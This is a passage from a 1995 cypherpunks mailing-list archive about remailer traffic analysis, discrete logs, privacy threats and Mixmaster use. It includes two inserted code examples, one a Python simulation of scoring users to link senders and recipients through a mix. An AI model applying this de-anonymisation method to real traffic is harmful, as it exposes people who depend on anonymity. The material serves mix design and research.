remailer.  More specifically, the problem is how can Eve trace Bob, who 
is communicating with Alice through an ideal Chaumian digital mix?  (As 
most of you know, current remailers are missing many of the features of 
the digital mix Chaum specified in his CACM paper (at 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/papers/chaum.digital-mix.gz 
), thus making them extremely vulnerable to anyone with non-trivial 
resources.)

The simplifying assumptions I use here are:
1.  there is one mix, which is perfectly secure and trustworthy (note 
    that multiple mixes do not increase untraceability over a single mix if 
    it is perfectly secure and trustworthy)
2.  anyone can monitor all traffic in and out of the mix, but no one can 
    link an incoming message with an outgoing one

The basic approach is to use this raw traffic information to calculate a 
SCORE for each user of the remailer with respect to Alice, where the 
user with the highest SCORE is the person Alice is most probably 
communicating with.  The idea is that with a Chaumian mix, every time 
Alice sends a message to Bob there is always a pattern of Alice sending 
a message to the mix, followed by Bob receiving a message from the mix 
during the next batch.  By counting the number of such correlations for 
each user over a period of time, and taking into account the fact that 
users who receive more messages from the mix will have higher numbers
of coincidental correlations, a SCORE can be calculated so that it would 
be a good indication over the long run of the probability that a particular 
user is communicating with Alice.

For a digital mix that does batching based on a fixed number of incoming 
messages, the SCORE for a user U can be calculated in the following way:
1.  for each mix batch i, calculate P(i)=lesser(# of messages sent by 
    Alice, # of messages subsequently received by user U)
2.  after a period of time t, calculate Q=sum(P(i))
3.  calculate the average value of Q of users with similar usage 
    patterns as user U
4.  SCORE(U) = Q / average(Q)

Now whether or not this approach actually works depends on whether the 
number of users with SCORE higher than Bob's SCORE converges to 0 as 
time t increases, and how quickly it converges.  Answering these two 
questions will require modeling the usage patterns of Alice, Bob, and 
the mix as a whole.  I'll try to do this for some simple cases in a later
post.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx9V8Tl0sXKgdnV5AQFg2gQAhEJ1wgf/XaqMOlVcvYfwgOeR2cKPPyQM
fitAJdXKkEXvTtUa3biByvVK86SLQmW/0cLME76UsmaMUY+FVncBoKwlRGKJnDci
6b7VtEW2ZkZKntUieTXFaVbSgI5XL/lIqQu2FFS6wuxH1KayxFeDLiTD6HWfa8t6
sedGrTb5f2I=
=Vjum
-----END PGP SIGNATURE-----
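
Added example (not part of Wei Dai's post): a small simulation of the SCORE procedure described above, of the kind a mix designer can use to gauge how quickly fixed-size batching exposes a persistent correspondent. The traffic model (heavy and light recipients, the send probabilities) and the reading of "users with similar usage patterns" as the k users closest in total received volume are assumptions made here, and all traffic is constructed.

```python
import random
from collections import Counter

BATCH = 10   # messages per mix batch (fixed-size batching, as in the post)
BOB = "bob"

def simulate(n_batches, rng, p_alice=0.3, p_to_bob=0.4, n_heavy=5, n_light=35):
    """Constructed traffic. Returns (users, batches); each batch is what an
    observer sees: (# messages Alice sent in, Counter of messages out per user)."""
    users = [BOB] + [f"heavy{i}" for i in range(n_heavy)] \
                  + [f"light{i}" for i in range(n_light)]
    weights = [1] + [10] * n_heavy + [1] * n_light   # background popularity (assumed)
    batches = []
    for _ in range(n_batches):
        received, alice_sent, slots = Counter(), 0, BATCH
        if rng.random() < p_alice:
            # Alice uses this batch; only some of her mail goes to Bob.
            alice_sent, slots = 1, BATCH - 1
            if rng.random() < p_to_bob:
                dest = BOB
            else:
                dest = rng.choices(users, weights)[0]
            received[dest] += 1
        for dest in rng.choices(users, weights, k=slots):   # everyone else's mail
            received[dest] += 1
        batches.append((alice_sent, received))
    return users, batches

def raw_q(batches, users):
    """Steps 1-2: Q(U) = sum over batches of min(# sent by Alice, # received by U)."""
    q = Counter({u: 0 for u in users})
    for alice_sent, received in batches:
        if alice_sent:
            for u, n in received.items():
                q[u] += min(alice_sent, n)
    return q

def volume(batches, users):
    """Total messages each user received from the mix (their 'usage pattern')."""
    v = Counter({u: 0 for u in users})
    for _, received in batches:
        v.update(received)
    return v

def scores(batches, users, k=4):
    """Steps 3-4: SCORE(U) = Q(U) / mean Q of the k users nearest in volume."""
    q, vol = raw_q(batches, users), volume(batches, users)
    out = {}
    for u in users:
        peers = sorted((p for p in users if p != u),
                       key=lambda p: abs(vol[p] - vol[u]))[:k]
        avg = sum(q[p] for p in peers) / k
        if avg:
            out[u] = q[u] / avg
        else:
            out[u] = float("inf") if q[u] else 0.0
    return out

def users_above_bob(batches, users, k=4):
    """The quantity the post asks about: how many users still outscore Bob."""
    s = scores(batches, users, k)
    return sum(1 for u in users if u != BOB and s[u] > s[BOB])

def demo(seed=1995):
    rng = random.Random(seed)
    users, batches = simulate(2000, rng)
    q, s = raw_q(batches, users), scores(batches, users)
    return {
        "top_by_raw_q": max(users, key=lambda u: q[u]),
        "top_by_score": max(users, key=lambda u: s[u]),
        "above_bob_by_window": {t: users_above_bob(batches[:t], users)
                                for t in (20, 200, 2000)},
    }

if __name__ == "__main__":
    print(demo())
```

Raw Q alone favours the busiest recipients, which is why the post divides by the average for comparable users; padding with dummy traffic or varying the batch composition changes how fast the count of users above Bob falls to zero.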




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Thu, 19 Jan 95 21:16:42 PST
To: mpd@netcom.com
Subject: Re: Factorisation and Discrete Logs
In-Reply-To: <199501190440.UAA28769@netcom5.netcom.com>
Message-ID: <9501200516.AA28512@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: mpd@netcom.com (Mike Duvos)
   Date: Wed, 18 Jan 1995 20:40:46 -0800 (PST)

   Derek Atkins <warlord@MIT.EDU> writes:

    > You are right...  Given talks I've had with Brian LaMacchia,
    > who broke a version of "Secure SunRPC" (a 192-bit prime), he
    > claims that the difficulty in reducing a D-L problem is
    > about the same amount of computation to factorize an RSA
    > modulus of approximately the same size..

Just to clarify, the estimate I give people is that computing discrete
logs in a prime field GF(p) is about as hard as factoring a number 10
digits (33 bits) longer than p.  This estimate is based on the empirical
data Andrew Odlyzko and I collected for 192-bit and 224-bit moduli.  To
the best of my knowledge no one has attempted a discrete log modulus
larger than 224 bits.  (There just haven't been any juicy targets
recently to attack...)

   Although DH and RSA are believed to be of approximately equal
   difficulty given the same number of bits, DH is additionally
   vulnerable because system designers usually publish an "official"
   modulus and primitive root for everyone to use, whereas in RSA,
   everyone has their own key.

This is not a property of D-H key exchange, per se, but of the actual
uses to which people have put the D-H protocol.  Two parties wishing to
generate a shared secret could certainly produce a D-H modulus and
generator on the fly for one-time use, but that takes some time.  The
fact that the discrete log problem is brittle simply means that you have
to choose your modulus taking a few more things into account when using
the D-H protocol for a particular application.

   To mount an attack on PGP, for instance, you must factor a key
   for each person whose privacy you wish to compromise.  Breaking
   Sun's published 192 bit DH modulus instantly broke SunRPC on all
   machines using the protocol.  The latter was a lot less work than 
   the former.

Breaking SunRPC was a lot less work than breaking a (typical) PGP key
simply because the SunRPC modulus was so small.  If I'm given a choice
of factoring 100 different 512-bit PGP keys (for 100 different users) or
breaking a 768-bit D-H modulus that compromises all 100 users
simultaneously, I'll take the factoring problems.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 19 Jan 95 23:41:18 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: Remailer-on-a-CD
In-Reply-To: <9501191924.AA17670@toad.com>
Message-ID: <m0rVDxj-0004IuC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> >The "Linux mavens" followed by the "black box" stuff sparked an idea...
> 
> >package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
> >that Linux could be installed on a DOS machine without any reformatting
> >repartitioning, or similar headaches.
> 
> >distribution already has) and some boot options, you'd have an "instant
> >remailer" software package, able to transform any 386SX/4MB RAM DOS machine
> >or better into a Linux-based remailer site, complete with aliases, logging

If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-
bones Linux set that will install right in a DOS filesystem (it's a .ZIP file).
It's intended for SLIP clients, but it could easily be adapted for setting
up an "instant remailer".
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 19 Jan 95 22:21:55 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Julf operates anon.penet.fi
In-Reply-To: <Pine.3.89.9501192004.A20171-0100000@vern.bga.com>
Message-ID: <199501200623.BAA25299@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan writes:
> sez it all

likewise





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Thu, 19 Jan 95 23:15:34 PST
To: blancw@pylon.com
Subject: Re: T.A.Z. on Disk
In-Reply-To: <199501200446.UAA04577@deepthought.pylon.com>
Message-ID: <Pine.3.89.9501200130.A35161-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



The book "Temporary Autonomous Zone" is available online at wiretap.spies.com
The most recent issue of Mondo 2000 talks about the CD with Hakim Bey and
the producer.

I also saw another e-book site that had some more of his stuff, can't 
remember what it was though.
Of course, one could always just buy them on paper (remember that?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Fri, 20 Jan 95 00:36:44 PST
To: cypherpunks@toad.com
Subject: RE: ELECTRONIC CASH ILLEG
Message-ID: <60.19099.6525.0C1CA93D@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 Thomas Grant Edwards <tedwards@src.umd.edu> writes:
 
TS+Actually, the "backing" of a fiat currency is the need to have some 
  +around to pay your taxes, else you go to jail.  You are taxed on many 
  +types of income, even if they are not directly exchanged in the fiat 
  +currency.  Somehow you have to get some.

This is pretty much true, but does not logically justify your 
conclusion:

TS+This also means that higher taxes can make the currency more desirable, 
  +lower taxes less, higher government spending less, lower government 
  +spending more, etc.
  
This is only somewhat true.

The most important factor is that currencies are traded on a fairly 
free market.  This means supply and demand, not any firm intrinsic 
qualities of anything, dominate.  If a country is running a positive 
net balance, whether by trade, capital investment, or influx of rich 
refugees, there will be a demand for its funnypaper, and that 
paper's price, in other currencies will rise.  

The same will apply to currencies not attached to countries -- such as 
the NetCredit, which I am working to put into reticulation.  That's 
electronic for "circulation".  :-)
 
The hardest currencies, roughly in order, are those of Switzerland, 
Taiwan, and Japan.  Germany is no longer on the list because Kohl 
bought the second last election in the most expensive bit of bribery in 
the history of democratic politics: the couple of trillion dollars he 
spent by assigning par value to the OstMark.  Hong Kong is not on the 
list because of the huge outflows for the development of China, which 
tends to balance supply and demand at a lower/softer level than it 
would otherwise have.  The US is no longer on the list because Reagan 
booted the whole thing into the can.
 
                        Best,
 
                            -dlj.
 
 

 
                                     -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 20 Jan 95 00:34:57 PST
To: cypherpunks@toad.com
Subject: Re: Threats in real life - what are we worried about?
Message-ID: <9501200836.AA19977@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
>	
>	Given existing crypto tools (PGP, etc), what are the top ten
>	practical attacks against the privacy of stored data and
>	electronic mail?  Who are the bad guys? What tools do we need
>	to limit these threats?
>
>I'll post my own thoughts later.
>


Matt's Top Ten Underappreciated Threats to Privacy on the Internet
==================================================================

1.  The sorry state of software.  Everyone knows that nobody knows how
to write software.  Modern systems give hundreds of thousands of lines
of code the chance to violate security policy.  How can we be sure
that the software we trust does the right thing?  How can we reduce
the opportunities for problems?

2.  Ineffective protection against denial of service attacks.  While
not a direct threat to privacy, the ease with which almost anyone can
mount effective denial of service attacks threatens the ability to
deploy anonymous services.  You'll note that no one worries very much
about the millions of anonymous entry points to more robust networks
like the telephone system or the postal service, where it's relatively
hard (and expensive) for an individual to cause large-scale service
disruption.  How can we make the 'net robust enough to withstand
mailbombs and newsgroup spamming?

3.  Poor secret storage on networked computers.  Cryptosystems allow
you to manage large secrets by protecting smaller ones (keys).
Unfortunately, modern computers are awful at protecting even the
smallest secrets.  Multi-user networked workstations can be broken
into and their memories compromised.  Standalone, single-user
machines can be stolen or compromised through viruses that leak
secrets asynchronously.  What are the right mechanisms for storing
and managing keys on various platforms?  Remote servers, where there
may be no user available to enter a passphrase (but see threat #5,
below), are an especially hard problem.

4.  Poorly understood random number generation techniques.  Keys and
session variables need good sources of unpredictable bits.  Currently
used techniques (like event inter-arrival times) are only marginally
well understood and depend a great deal on low-level
characteristics of the platforms on which they are run.  We need a
wider range of techniques (especially ones that work without relying
on user input), and to better understand their risks and failure
modes.  Some interesting ideas have been proposed that deserve further
study.  At CRYPTO '94 there was an interesting paper on using disk
airflow variation to get random bits.  Another interesting technique,
first proposed by Don Mitchell, involves exploiting clock skew.  Here's
a C program that seems to produce one pretty random bit per second on
most platforms.  How good are the bits?  Can we get more bandwidth out
of it?

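#include <signal.h>
#include <unistd.h>

/* Free-running counter; volatile so the handler always sees the live value. */
volatile unsigned int count = 0;

/* SIGALRM handler: emit the low bit of the counter, then re-arm the timer. */
void printbit(int sig)
{
	char bit = '0' + (count & 01);

	(void)sig;
	signal(SIGALRM, printbit);
	alarm(1);
	write(STDOUT_FILENO, &bit, 1);	/* write() is async-signal-safe; printf() is not */
}

int main(void)
{
	signal(SIGALRM, printbit);
	alarm(1);
	while (1)
		count++;	/* spin; the CPU clock races the one-second timer */
}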

5.  Weak passphrases.  Most crypto software addresses the key storage
and key generation problems by relying on user-generated passphrase
strings, which are presumed to contain enough entropy to produce good
key material and are also easy enough to remember that they do not
require secure storage.  While dictionary attacks are a well known
problem with short passwords, much less is known about lines of attack
against user-selected passphrase-based keys.  Shannon tells us that
English text has just over 1 bit of entropy per character, which would
seem to leave most passphrases well within reach of brute-force
search.  Less is known, however, about good techniques for enumerating
passphrases in order to exploit low entropy.  Until we have a better
understanding of how to attack passphrases, we really have no idea how
weak or strong they are.

6.  Limited support for remote trusted agents.  Almost all currently
available cryptographic software assumes that the user is in direct
control over the systems on which they run and has a secure path to
it.  For example, the interfaces to programs like PGP and CFS assume
that their input comes from the user over a secure path like the
local console.  This is not always the case, of course; consider the
problem of reading your mail remotely when logged in over the
Internet.  We need better mechanisms for transferring the trusted
operations to the local trusted machine while keeping the logical
operations (like where the mail is) where they logically belong.

7.  Poorly understood protocol and service interactions.  Features
frequently come back to bite us, and it's hard to know even where to
look.  The Internet worm was propagated via an obscure and
innocent-looking feature in sendmail; how many more features in how
many more programs have unexpected consequences just waiting to be
discovered?  Is the conventional wisdom of hiding behind firewalls
and turning off services really the only answer?

8.  Lack of scalable security infrastructure.  No comment...

9.  Poorly understood "out of band" attack risks.  Security people
tend to focus on what's easy to model.  Unfortunately, attackers focus
on what's easy to exploit.  We need a better understanding of just how
easy some non-traditional attacks are.  Most of the answers are
probably too scary to think about.  How long do our keys need to be in
the face of electromagnetic radiation, physical monitoring, Trojan
horses, social engineering, and so on and so on?

10. No broad-based demand for security.  This is a well-known problem
among almost everyone who has tied his or her fortune to selling
security products and services.  Until there is widespread demand for
transparent security, the tools and infrastructure needed to support
it will be expensive and inaccessible to many applications.  This is
partly a problem of understanding the threats and risks in real
applications, and of building systems that include security as a basic
feature rather than as a later "add on".

There's a lot missing from this list, and a lot you can disagree with
among the things that are on it.

Flame away...

-matt
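
An added example, not part of the post above and not Matt Blaze's code: one way to start on the question "How good are the bits?" from item 4 is to run a monobit test and a lag-1 test over the sampler's output, and to see what a von Neumann corrector does to a biased stream. The function names, the 5% threshold and the sample bit string are assumptions made for this illustration; the sample is constructed, not captured from a real run.

```c
#include <stdio.h>
#include <stddef.h>

#define MAX_BITS  4096
#define CHI2_CRIT 3.841   /* chi-square, 1 degree of freedom, 5% level */

/* Constructed sample: 40 bits from an imaginary run that leans towards 1. */
static const char SAMPLE[] =
    "1101111011" "1011110111" "1110110111" "1110110111";

/* Copy the '0'/'1' characters of s into out (one bit per byte); return count. */
size_t parse_bits(const char *s, unsigned char *out, size_t max)
{
    size_t n = 0;
    for (; *s && n < max; s++)
        if (*s == '0' || *s == '1')
            out[n++] = (unsigned char)(*s - '0');
    return n;
}

/* Monobit statistic (ones - zeros)^2 / n.  Above CHI2_CRIT: stream is biased. */
double monobit_chi2(const unsigned char *bits, size_t n)
{
    long ones = 0, diff;
    for (size_t i = 0; i < n; i++)
        ones += bits[i] & 1;
    diff = 2 * ones - (long)n;
    return n ? (double)(diff * diff) / (double)n : 0.0;
}

/* Same statistic on "adjacent bits equal" vs "adjacent bits differ".
 * Above CHI2_CRIT: each bit says something about the next one. */
double lag1_chi2(const unsigned char *bits, size_t n)
{
    long same = 0, pairs, diff;
    if (n < 2)
        return 0.0;
    for (size_t i = 1; i < n; i++)
        same += ((bits[i] ^ bits[i - 1]) & 1) == 0;
    pairs = (long)n - 1;
    diff = 2 * same - pairs;
    return (double)(diff * diff) / (double)pairs;
}

/* Von Neumann corrector: read non-overlapping pairs, 10 -> 1, 01 -> 0,
 * drop 00 and 11.  Removes bias only if the input bits are independent,
 * which is what lag1_chi2() probes.  out needs room for n/2 bits. */
size_t von_neumann(const unsigned char *in, size_t n, unsigned char *out)
{
    size_t k = 0;
    for (size_t i = 0; i + 1 < n; i += 2) {
        unsigned a = in[i] & 1, b = in[i + 1] & 1;
        if (a != b)
            out[k++] = (unsigned char)a;
    }
    return k;
}

static void report(const char *label, const unsigned char *bits, size_t n)
{
    double m = monobit_chi2(bits, n), l = lag1_chi2(bits, n);
    printf("%-10s n=%zu  monobit=%.3f%s  lag1=%.3f%s\n", label, n,
           m, m > CHI2_CRIT ? " (biased)" : "",
           l, l > CHI2_CRIT ? " (correlated)" : "");
}

int main(int argc, char **argv)
{
    static unsigned char raw[MAX_BITS], fixed[MAX_BITS / 2];
    size_t n = 0, k;
    int c;

    (void)argv;
    if (argc > 1) {   /* any argument: read '0'/'1' characters from stdin */
        while (n < MAX_BITS && (c = getchar()) != EOF)
            if (c == '0' || c == '1')
                raw[n++] = (unsigned char)(c - '0');
    } else {
        n = parse_bits(SAMPLE, raw, MAX_BITS);
    }
    k = von_neumann(raw, n, fixed);
    report("raw", raw, n);
    report("corrected", fixed, k);
    printf("throughput after correction: %zu of %zu bits\n", k, n);
    return 0;
}
```

On the constructed sample the corrector keeps 8 of 40 bits, which bears on the "more bandwidth" question: debiasing costs throughput, and passing both tests says nothing about predictability to someone who can model the platform's timers.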




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 20 Jan 95 00:53:20 PST
To: cypherpunks@toad.com
Subject: Remailer Software Sites/Comparison
Message-ID: <199501200858.DAA05727@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:
> Can anyone give an overview of the remailer packages that are currently
> available?  What features and differences do they have, and where to get
> them?

Raph Levien's Remailers WWW page has links to most of the material on
the remailer software of which I'm aware:
http://http.cs.berkeley.edu/~raph/remailer-list.html

The remailer-help file from mixmaster@nately.ucsd.edu gives an ftp directory
from which one may ultimately obtain Lance Cottrell's Mixmaster code, after
following an export control process which I assume resembles MIT's method of
distributing PGP. Lance sent out a first draft of instructions on the
mixing (including packet splitting & recombination) features of Mixmaster to
the list a few months ago, which I enclose below. Mixmaster is the latest
and most sophisticated of the remailer packages I've seen, so I'd
recommend it to anyone looking to install a new remailer in North America.

- -L. Futplex McCarthy

===== forwarded message follows ===============

Date: Sun, 20 Nov 1994 17:07:02 -0800
To: cypherpunks@toad.com, remailer-operators@c2.org
Subject: 1st Draft Mixmaster chaining instructions
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-Status:

[...]

Here is the first draft of the instructions for using Mixmaster to
build remailer messages. I am posting it to give a flavor of what the
program does, and to request comments, both on the features and on
the clarity of the help file itself.

Instructions for using Mixmaster to create type 2 remailer messages.

I assume that you have either compiled Mixmaster, or that you have acquired
a precompiled copy.

While you do not need PGP to use Mixmaster, it is useful for key
management, and is required if you desire security of the content of the
message you are sending (which will be visible to the last remailer).


Theory and purpose of remailers:

The purpose of anonymous remailers (hereafter simply remailers), is to
provide protection against traffic analysis. Traffic analysis is the study
of who you are communicating with, when, and how often. This reveals more
than you might expect about your activities. It will indicate who your
friends and colleagues are (and they can be told apart by looking at the
times you contact them). What your interests are, from which catalog
companies you contact, and which ftp and WWW sites you visit. Traffic
analysis can even reveal business secrets, e.g. your frequent contact with
a rival could give hints of an impending merger.

Remailers protect your email from traffic analysis. The original remailers
did this by removing all headers, except the subject line, from any message
you sent to them and then forwarding them to a destination of your choice. The
recipient of such a message would not know who had sent it.

The addition of encryption to this scheme gave significant protection from
attackers who simply look at passing messages for to and from fields.
Passing a message through several remailers in a row is much better, but
still vulnerable to an attacker who can watch messages go into and out of
each remailer.

Two more elements are required: messages must be reordered within the
remailer before being forwarded (this is being done by a few of the old
style remailers), and all messages must be indistinguishable. This last is
the primary improvement with the type 2 remailer, Mixmaster.


Using type 2 remailers:

The trend towards ever more complicated remailer message formats has been
clear for some time. Several programs have been written to automatically
build messages which will be remailed by several remailers. This process is
called chaining.
With type 2 remailers it is no longer possible to create these messages by
hand. Mixmaster takes a message you wish to send, a list of remailers to
chain it through, and a final destination, and builds the packet which the
remailers will use. For simplicity I will first describe the interactive
use of Mixmaster, then I will discuss how it can be controlled through
command line arguments.


Interactive use of Mixmaster:

If you run Mixmaster with no arguments, you will be prompted for all the
required information.

First you will be asked to specify the final destination of the message.
This is the full email address where you want your message delivered.
Remember that the message is being sent by the last remailer in the chain,
so you must specify the full internet address (e.g.
name@machine.place.com), you may not use local mail aliases. You may enter
multiple recipients on separate lines. Hit return on a blank line to stop
entering destinations. You must have at least one.

Next you will be asked to enter any headers you want to have inserted
before the message. These are those lines at the beginning of email
messages, like From: fred@bedrock.univ.edu, or Subject: Party invitation.
If you want your message to have a subject when it is delivered, you must
enter a line
Subject: your subject here.
Note that Subject must be capitalized, with the : and space as shown.
A subject header can be added by using the -s command line argument.
When you are done entering headers, hit return (it is OK to have zero headers).

You will now be presented with a list of remailers through which you can
chain your messages. The order in which you choose them is the order in
which they will be traversed by your message. You may choose up to 20 of
them, but remember that the reliability and speed of the chain diminish as
the number of remailers in the chain increases. Four is a reasonable number
of remailers to use. It is fine to use a given remailer more than once in
your chain. Press return on a blank line to stop entering remailers.

Finally you will be asked what file you want to send. This must be an ASCII
file. You may either enter the name of an existing file, or you may choose
to enter the message directly by typing "stdin" as the file name. This is
intended for use by scripts. There are no editing capabilities when using
stdin. Enter the end of file character (EOF is ^D) when you are done
entering the file.

Mixmaster will now build the type 2 remailer packet, and send it to the
first remailer in the chain.


Command line arguments to Mixmaster:

Mixmaster [-c] [in.filename] [-f] [-s "subject"] [-o "outfile"] [-to a@b.com] [-l 3 2 6 ...]

 -c      this indicates that chaining rather than remailer functions are
desired. It is a NOP since chaining is the default operation.

"filename"      if a filename is given, then this will be used as the input
file. As in the interactive mode, you may choose "stdin". No filename will
be prompted for.

 -f      filter mode. All prompts suppressed, but input still accepted as
described in the interactive section. The remailer list must be specified
on the command line.

 -s "subject"    Adds a subject line to the message. The user should NOT
include Subject: in this string. Mixmaster will not prompt for other
headers if -s is used.

 -o "outfile"    Specify an output file rather than sending the message to
the first remailer automatically. If outfile is "stdout", then the remailer
packet will be printed to stdout.

 -to foo@bar.org specifies the final destination of the message. Only one
destination can be specified. Mixmaster will not prompt for other
destinations if -to is used.

 -l 4 3 5 ...    Specifies the list of remailers to chain through. This must
be the last argument on the command line. A maximum of 20 remailers may be
specified. Mixmaster will not prompt for other remailers if -l is used.


- --------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
[...]
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx97BioZzwIn1bdtAQEMvQF/RlnlugSboXC/+LtZoyfVm4Blc4/do0re
59XYOo7Vs/AQRWLZU4iM8h65axpr7G3f
=VW+M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Fri, 20 Jan 95 04:09:42 PST
To: cypherpunks@toad.com
Subject: remailer questions
Message-ID: <199501201209.EAA01188@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



Ok, I'm planning on putting up a remailer on my Linux box.   

One of the things I'd really like to know is, how much in the way of
attempts to break into your machines are remailer ops seeing?  

How much in the way of other attacks?

I'd also like to get some idea of the amt of resources consumed by
a relatively popular remailer -- amt of system loading, disk space
devoted to remailing activities, and anything else.  

I know loading will be hard to quantify in a meaningful way, but for
reference my machine is a 486/66 w/32 megs RAM and pretty fast SCSI
disks.  Just a general idea of how significant the load on such
a machine will be would be nice.  My SCSI and Ethernet are both fast,
and on a PCI bus.

My site is at the moment, I think, relatively secure.  I have few users
and am sure at the moment nobody has an easily crackable password.  I
plan to install a fascist password checker soon.  

I currently have ftpd and fingerd commented out of my inetd.conf.
(I plan to put ftpd back, at some point, but really don't like outsiders
being able to do a finger @site and find out who is on, how long, how long
idle, find out when users last logged on or read their mail, etc.  I will
probably want to add it back after modifying it or finding a stock one
that does what I want.)  

I have tcp wrappers installed, and have checked on a number of blatant
security holes that I know of.

I am worried that once I begin running a remailer, the number of attacks
on my machine will increase dramatically.  I'd of course like for my
data and my users' data to remain private, and believe that a compromised
remailer is (obviously) worse than no remailer at all.

What would be nice, before I put up a remailer, would be to have any
willing, security-knowledgeable cypherpunk subscribers out there to
probe my machine for any really obvious chinks, for security-aware
Linux users to point out any Linux or Slackware-specific security
holes, etc.  Of course I'd want to have a word with anyone willing
to probe me before they just went at it... ;)

Linux kernel is currently 1.1.81, which is quite stable for me, 
and the Slackware distribution is 1.2.0.  

I'm running sendmail 8.6.9, are there any really terrible vulnerabilities
in it any longer from outside the machine?  From inside?

Of course, I'm on an Ethernet with others, and have users logging in
from other Ethernets, so am vulnerable to sniffers.  I don't
think it's going to be feasible to install skey here, as a number
of my users are extremely non-technical.

I'm also still looking around for what I'm going to run.
I'd like for it to be easy to reply to users, but absolutely 
impossible for me to 'out' anyone under any circumstances.  The 
encrypted-sender stuff some remailers currently use is probably too
ugly for most average joes to want to use, and not as secure as I'd
like.  It's probably the best available at the moment.  This should
definitely change.

What I'd *really* like to do would be to write a client and server
to make an anonymous pool act like normal email ... this is really 
the only way I can think of to make replying easy but also to have
good security.  I'm sort of surprised someone has not done this yet.
It'd be pseudonymous, your client would only look at messages for
you or for everyone (for your convenience -- of course anyone could
look at anything, but it'll all be PGP'ed, so...)  Some really 
neat things that could be done w/this... for folks willing to 
trust the server to some degree, cross-referencing of pseudonyms
and public keys could be done, allowing joe user to just mail to
a pseudonym -- this would be good in cases where one party wishes to
hide, while the other has nothing to hide and is possibly very
non-technical.  He'd have no guarantee that someone wasn't reading
his mail to the pseudonymous party, on the way in, but the p.n. party
would not have to worry about having his real address cross-referenced,
or about the server having the key to decrypt his real (included) address
in memory or on disk.  

Anon pools are obviously doable right now, with a mailing list, but
the inconvenience of using one like this is a real barrier.

An anonymous pool;  Usenet-like -- distributed over many machines in
many countries, but with pseudonyms instead of "real names" and
public keys as addresses.  This is definitely doable, right now.
NNTP-type servers doing news and mail service.  As the scale got
larger, we'd of course not want to send everyone's mail to all
the servers, but tying a user down only as far as to a given server
would probably not be a problem -- look at all the different folks that
may use one NNTP server.  Perhaps mail for a given user could be sent
to several different servers to keep things muddy.

Mixmaster does not currently run on Linux, is that correct?  
Anyone know what the problem is, or have an idea what amt of work 
would be involved in porting it?  I'd like to look at this.

Really, though, everything out there is pretty unsatisfactory --
only anonymous pools and DC-nets have the characteristics I'm
interested in.  Anyone on the list doing any serious work on 
DC-nets?  I find these extremely exciting, and don't see much
brainstorming on implementation going on.


regards,
Craig.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Fri, 20 Jan 95 04:29:02 PST
To: cypherpunks@toad.com
Subject: Re: remailer questions
In-Reply-To: <199501201209.EAA01188@tower.stc.housing.washington.edu>
Message-ID: <199501201228.EAA01257@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text


> 
> Linux kernel is currently 1.1.81, which is quite stable for me, 
> and the Slackware distribution is 1.2.0.  

Errata: make that 2.1.0


-Craig



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Jan 95 08:24:38 PST
To: cypherpunks@toad.com
Subject: Re:  traffic analyzing Chaum's digital mix
Message-ID: <199501201624.IAA13926@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> I have been thinking about the problem of traffic analysis of a 
> remailer.
> [...]
> The basic approach is to use this raw traffic information to calculate a 
> SCORE for each user of the remailer with respect to Alice, where the 
> user with the highest SCORE is the person Alice is most probably 
